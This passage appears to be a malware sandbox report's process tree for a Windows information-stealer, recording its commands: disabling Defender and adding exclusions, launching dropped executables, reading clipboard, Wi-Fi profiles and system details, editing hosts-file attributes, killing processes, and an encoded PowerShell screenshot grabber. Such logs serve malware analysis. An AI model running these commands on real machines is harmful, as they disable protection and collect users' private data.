      PID:5372
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5516
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
      4⤵
      PID:5292
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5536
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "start bound.exe"
      4⤵
      PID:5276
    - - C:\Users\Admin\AppData\Local\Temp\bound.exe
        
        bound.exe
        5⤵
        Executes dropped EXE
        
        PID:4420
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:2024
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:5684
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
      4⤵
      PID:2276
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:5572
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
      4⤵
      PID:5416
    - - C:\Windows\system32\reg.exe
        
        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
        5⤵
        
        PID:5948
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
      4⤵
      PID:6104
    - - C:\Windows\system32\reg.exe
        
        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
        5⤵
        
        PID:2384
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
      4⤵
      PID:6048
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        5⤵
        Detects videocard installed
        Suspicious use of AdjustPrivilegeToken
        
        PID:5580
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
      4⤵
      PID:5768
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        5⤵
        Detects videocard installed
        
        PID:5360
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
      4⤵
      PID:5588
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1948
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:3304
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:5288
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"
      4⤵
      PID:6032
    - - C:\Windows\system32\reg.exe
        
        reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
        5⤵
        Modifies registry key
        
        PID:5564
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:5888
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:5760
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
      4⤵
      PID:628
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
        5⤵
        
        PID:5788
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
      4⤵
      PID:5828
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-Clipboard
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:5812
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "reg query "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\OneDriveSetup.exe" /v DisplayIcon"
      4⤵
      PID:5684
    - - C:\Windows\system32\reg.exe
        
        reg query "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\OneDriveSetup.exe" /v DisplayIcon
        5⤵
        
        PID:5440
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:5428
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:5532
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:4492
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:6296
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
      4⤵
      PID:6048
    - - C:\Windows\system32\netsh.exe
        
        netsh wlan show profile
        5⤵
        
        PID:6416
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "systeminfo"
      4⤵
      PID:5832
    - - C:\Windows\system32\systeminfo.exe
        
        systeminfo
        5⤵
        Gathers system information
        
        PID:6312
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
      4⤵
      PID:4792
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:6340
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\3p4ni4q2\3p4ni4q2.cmdline"
        6⤵
        
        PID:7048
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES97DB.tmp" "c:\Users\Admin\AppData\Local\Temp\3p4ni4q2\CSCDF1786E7F7CA408394DBF48758E84966.TMP"
        7⤵
        
        PID:5976
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
      4⤵
      PID:5700
    - - C:\Windows\system32\reg.exe
        
        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
        5⤵
        
        PID:6480
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "Camera.exe /devlist"
      4⤵
      PID:5408
    - - C:\Users\Admin\AppData\Local\Temp\_MEI57082\Camera.exe
        
        Camera.exe /devlist
        5⤵
        Executes dropped EXE
        
        PID:6596
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:6516
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:6688
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
      4⤵
      PID:6628
    - - C:\Windows\system32\attrib.exe
        
        attrib -r C:\Windows\System32\drivers\etc\hosts
        5⤵
        Drops file in Drivers directory
        Views/modifies file attributes
        
        PID:6756
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:6768
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:6884
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
      4⤵
      PID:6832
    - - C:\Windows\system32\attrib.exe
        
        attrib +r C:\Windows\System32\drivers\etc\hosts
        5⤵
        Drops file in Drivers directory
        Views/modifies file attributes
        
        PID:6916
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:6928
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:7024
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:6952
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:7108
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:7056
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:7156
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:716
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:6104
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:5376
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2712"
      4⤵
      PID:6164
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 2712
        5⤵
        Kills process with taskkill
        
        PID:6288
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2712"
      4⤵
      PID:6208
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:5580
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 2712
        5⤵
        Kills process with taskkill
        
        PID:3444
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3680"
      4⤵
      PID:5684
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 3680
        5⤵
        Kills process with taskkill
        
        PID:5576
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3680"
      4⤵
      PID:2768
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:5564
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 3680
        5⤵
        Kills process with taskkill
        
        PID:4492
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2084"
      4⤵
      PID:6580
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:5788
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 2084
        5⤵
        Kills process with taskkill
        
        PID:2024
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2084"
      4⤵
      PID:5804
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 2084
        5⤵
        Kills process with taskkill
        
        PID:4356
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1512"
      4⤵
      PID:6620
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:6516
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 1512
        5⤵
        Kills process with taskkill
        
        PID:6232
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1512"
      4⤵
      PID:6688
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 1512
        5⤵
        Kills process with taskkill
        
        PID:6324
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1232"
      4⤵
      PID:5676
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 1232
        5⤵
        Kills process with taskkill
        
        PID:6668
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1232"
      4⤵
      PID:6368
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 1232
        5⤵
        Kills process with taskkill
        
        PID:6696
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4532"
      4⤵
      PID:4212
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 4532
        5⤵
        Kills process with taskkill
        
        PID:6832
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4532"
      4⤵
      PID:6856
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 4532
        5⤵
        Kills process with taskkill
        
        PID:7024
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 960"
      4⤵
      PID:6740
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 960
        5⤵
        Kills process with taskkill
        
        PID:7056
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 960"
      4⤵
      PID:4420
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 960
        5⤵
        Kills process with taskkill
        
        PID:5224
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4928"
      4⤵
      PID:1828
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 4928
        5⤵
        Kills process with taskkill
        
        PID:2096
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4928"
      4⤵
      PID:5956
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 4928
        5⤵
        Kills process with taskkill
        
        PID:6488
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5144"
      4⤵
      PID:6748
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 5144
        5⤵
        Kills process with taskkill
        
        PID:1808
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5144"
      4⤵
      PID:5484
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:4792
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 5144
        5⤵
        Kills process with taskkill
        
        PID:4352
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5152"
      4⤵
      PID:6036
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 5152
        5⤵
        Kills process with taskkill
        
        PID:6956
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5152"
      4⤵
      PID:6240
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 5152
        5⤵
        Kills process with taskkill
        
        PID:6184
